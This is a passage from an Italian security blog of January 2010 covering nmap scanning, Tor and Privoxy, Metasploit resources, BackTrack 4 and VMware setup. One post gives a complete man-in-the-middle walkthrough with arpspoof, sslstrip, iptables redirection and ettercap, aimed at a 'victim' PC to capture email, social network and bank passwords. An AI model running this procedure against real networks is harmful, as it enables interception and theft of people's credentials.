per controllare la sicurezza della propria rete. Molti amministratori di rete trovano utile nmap per compiti come l'inventario della rete, la gestione dei programmi di aggiornamento del servizio, e il monitoraggio di accoglienza o di uptime del servizio. Nmap utilizza dei semplici pacchetti IP per determinare quali host sono disponibili sulla rete, quali servizi (nome di applicazione e versione) questi host offrono, quali i sistemi operativi (e versioni del sistema operativo) sono in esecuzione, che tipo di filtri di pacchetti / firewall sono in uso, e decine di altre caratteristiche. È stato progettato per velocizzare la scansione di reti di grandi dimensioni, ma funziona bene anche contro singoli host (Linux, Windows, e Mac OS X. Nmap viene eseguito su tutti i principali sistemi operativi per computer, i pacchetti ufficiali sono disponibili per Linux, Windows e Mac OS X. Vi elenco alcuni comandi di nmap utili per effettuare una scansione di rete, comunque vi consiglio di leggervi le guide online su http://nmap.org/. Avviate nmap da shell e date i seguenti comandi:

morfes@morfes:~$ nmap --help
Nmap 5.00 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sP: Ping Scan - go no further than determining if host is online
-PN: Treat all hosts as online -- skip host discovery
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers : Specify custom DNS servers
--system-dns: Use OS's DNS resolver
--traceroute: Trace hop path to each host
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags
-sI : Idle scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-sO: IP protocol scan
-b : FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports : Scan most common ports
--port-ratio : Scan ports more common than
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity : Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=: is a comma separated list of
directories, script-files or script-categories
--script-args=: provide arguments to scripts
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take

questo è l'help di nmap dove potete vedere tutte le sue opzioni

morfes@morfes:~$ nmap 192.168.1.0/24

comando per scansionare il range degli ip della nostra rete lan

morfes@morfes:~$ nmap -sV -T Aggressive 192.168.1.103 -v

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-17 22:42 CET
NSE: Loaded 3 scripts for scanning.
Initiating Ping Scan at 22:42
Scanning 192.168.1.103 [2 ports]
Completed Ping Scan at 22:42, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:42
Completed Parallel DNS resolution of 1 host. at 22:42, 0.05s elapsed
Initiating Connect Scan at 22:42
Scanning 192.168.1.103 [1000 ports]
Discovered open port 139/tcp on 192.168.1.103
Discovered open port 1025/tcp on 192.168.1.103
Discovered open port 445/tcp on 192.168.1.103
Discovered open port 135/tcp on 192.168.1.103
Completed Connect Scan at 22:42, 0.22s elapsed (1000 total ports)
Initiating Service scan at 22:42
Scanning 4 services on 192.168.1.103
Completed Service scan at 22:42, 6.02s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.1.103.
NSE: Script Scanning completed.
Host 192.168.1.103 is up (0.0020s latency).
Interesting ports on 192.168.1.103:
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
Service Info: OS: Windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds


comando per una scansione approfondita di un indirizzo ip, dove vengono rilevate le porte aperte con i relativi servizi e il sistema operativo dell'host!



giovedì 14 gennaio 2010

Installare Tor e Privoxy


Installare Tor e Privoxy su Ubuntu, Debian e Backtrack 4, se volete utilizzare un proxy web per navigare in anonimato, vi consiglio di installare Tor insieme a Privoxy, tor è il miglior proxy web per la navigazione anonima. Per installare Tor e Privoxy seguite questa guida Installare TOR e Privoxy su Debian e Ubuntu, un' ottima guida dove contiene anche un script per avviare, stoppare e riavviare Tor e Privoxy, la guida può essere utilizzata anche per Backtrack 4, però vi consiglio di installa tor e privoxy da Gestore Pacchetti Synaptic o da shell apt-get install tor privoxy senza inserire alcuno repository come dice la guida per evitare di compromettere i repository di backtrack. Installato Tor e Privoxy su BT4 possiamo fare un collegamento su Menu K - Services - Proxy dove andrà inserito anonymity.

AGGIORNAMENTO

Possiamo anche installare tor per i sistemi linux seguendo la documentazione del sito ufficiale di tor qui, spiega come installare tor dai repository o compilando i sorgenti, vi sono anche già pronti i file di configurazione per polipo e privoxy.



martedì 12 gennaio 2010

ExploitMs08_067 con FrameWork 3






Questo video dimostra una famosissima vulnerabilità di Windows "ms08_067", quindi se usate ancora sistemi operativi Windows 2000 o XP fino al SP2 vi consiglio di tenerli sempre aggiornati, di installare la patch per ms08_067 sul sito della Microsoft che andrà a correggere la falla del servizio di rete e di utilizzare altri tipi di firewall non quello di windows.

Ecco il link del video su youtube EXploitMs08_067


lunedì 11 gennaio 2010

BackTrack 4 Final


Sono lieto di annunciarvi l'uscita di BackTrack 4 Final, scaricabile dal suo nuovo sito BackTrack Linux, un sito dalla grafica stupenda e ricco già di tutorial, con il suo nuovo blog e forum. Visitatelo e buon divertimento a tutti con la BackTrack 4.



domenica 10 gennaio 2010

Ssl-Strip con Ettercap

SslStrip assieme ad Ettercap permette di sniffare password durante l'accesso in siti con cifratura ssl, siti che dovrebbero essere sicuri ad un eventuale attacco, quindi se un malintenzionato entra nella vostra rete privata, dovuta ad una mancanza di protezione della vostra rete wireless, potrebbe venire in possesso dei vostri account email e password di hotmail, gmail, facebook e anche bancari. Illustrerò la configurazione di SsLStrip corredata di video dimostrativo pubblicato su youtube da Backtrack.it dove potete vedere altri stupendi video dimostrativi come quelli per Ettercap, questo è un tutorial dimostrativo non mi assumo nessuna responsabilità per un eventuale uso illegale.

Rileviamo la nostra interfaccia di rete wireless o ethernet

root@morfes:~# ifconfig wlan1

configuriamo gli iptables del nostro firewall

root@morfes:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@morfes:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

effettuiamo con nmap una scansione dei range degli ip della nostra rete partendo dall'ip del router, per poter trovare l'ip del nostro pc vittima

root@morfes:~# nmap 192.168.1.1-254

avviamo arpspoof
è mettiamo l'interfaccia di rete, l'ip vittima e l'ip del router

root@morfes:~# arpspoof -i wlan1 -t 192.168.1.101 192.168.1.1

avviamo sslstrip da un'altro terminale è digitiamo

root@morfes:~# sslstrip -a

sempre da shell avviamo ettercap
, ma prima dobbiamo modificare il file di configurazione di etter.conf in /etc/ ovviamente logati da root cosi:

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

togliendo i #

# if you use ipchains:
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

adesso avviamo ettercap e digitiamo

root@morfes:~# ettercap -T -q -i wlan1

da questo momento in poi quando entriamo nei nostri account email dal pc vittima, sniffiamo tutte le password! :)




MetasploitFramework - Milw0rm - Exploitdb


Metasploit Framework è un progetto realizzato per fornire informazioni sulle vulnerabilità, rilevamento di intrusioni e per semplificare le operazioni di penetration testing. Metasploit si divide in due progetti framework2 e framework3, il 2 è stato abbandonato. Framework è un insieme di strumenti per lo sviluppo e l'esecuzione di exploits, shellcodes, auxiliary e opcode, per maggiori informazioni visitate il sito di Metasploit, invece per una guida in italiano visitate il sito di Backtrack.it, qui troverete un file in pdf che spiega l'utilizzo di Metasploit e altre interessanti guide come quella di Milw0rm. Potete anche seguire il corso online di Metasploit Unleashed offerto dal team di Offensive Security.




Milw0rm è un sito che archivia tutte le vulnerabilità, exploits e shellcodes appena scoperti, un punto di riferimento per tenersi aggiornati sulle vulnerabilità dei sistemi operativi, cms e web server, ovviamente per maggiori informazioni visitate il sito di Milw0rm o la guida in pdf su Backtrack.it.




Exploitdb è il nuovo sito di archiviazione degli exploits che ha sostituito il vecchio Milw0rm, creato dall' Offensive Security visitate il sito è molto interessante Exploitdb.

Questo è tutto, ciao a tutti!

venerdì 8 gennaio 2010

Installare VMware Server su BT


Vmware Server è un potente virtual machines che permette di virtualizzare sistemi operativi sia windows che linux, è molto utile installarlo su BT4 specialmente se dobbiamo fare penetration test su più vari sistemi operativi ma abbiamo solo una o due macchine fisiche "computer". L'installazione richiede una registrazione gratuita al sito VMware per ottenere la chiave di licenza, per installarlo seguite il video dell' Offensive Security, fate molta attenzione durante l'installazione ci sono alcuni accorgimenti da effettuare rispetto al video. Inanzitutto scaricate il pacchetto vmware-server.tar.gz dal sito, una copia salvatela in /tmp/vmware come da video, arrivati alla parte in cui vi chiede che interfaccia di rete volete utilizzare per l'host cioè il pc che avvierà la virtual machine quindi BT4 scegliete eth0 di default se vi collegate via cavo o mettete wlan0, wlan1 se utilizzate una scheda wifi. Completata l'installazione VMware si avvierà automaticamente come Nessus all'avvio di Bt4, utilizziamo rcconf per disattivare l'avvio automatico, per avviare e stoppare vmware diamo da shell

root@morfes:~# /etc/init.d/vmware start

root@morfes:~# /etc/init.d/vmware stop

sul browser scriviamo https://127.0.0.1:8333 per far partire l'interfaccia web di VMware Server accettiamo il certificato SSL, prima di installare il nostro sistema operativo virtuale, dobbiamo scegliere quale modalità dare al network adapter bridged o nat, io vi consiglio bridged perchè se avete attivato dal vostro router il servizio DCHP assegnerà in automatico l'indirizzo ip della vostra rete privata invece nat creererà una nuova rete privata quindi non adatta per fare penetration test, vi linko una guida che spiega il networkig della vmware server "Networking con VMWARE Server" , anche se si riferisce per la versione di windows. Installato e avviato il nostro sistema operativo virtuale, avremo problemi con la funzionalità della tastiera, infatti vmware server versione linux la keyboard non funziona bene, per risolvere il problema andiamo su /usr/lib/vmware/ e con un editor di testo "Kate" apriamo il file config e inseriamo xkeymap.nokeycodeMap = "TRUE" salviamo e avremo la tastiera funzionante tranne per il tasto "Alt Gr" che non viene riconosciuto. Questa procedura d'installazione della VMware Server credo possa funzionare anche per Ubuntu! Ciao a tutti alla prossima!





Aggiornamento


Con la nuova BT4 final la procedura per installare la VMware Server come da video non funziona, in quanto il kernel della BT4 Final è cambiato, quindi bisogna ricompilare la VMware una procedura non semplice, quindi vi consiglio di installarvi direttamente VMware Player o Workstation con questi semplici comandi:

root@morfes:~# chmod 755 VMware-Player-3.0.0-203739.i386.bundle

root@morfes:~# ./VMware-Player-3.0.0-203739.i386.bundle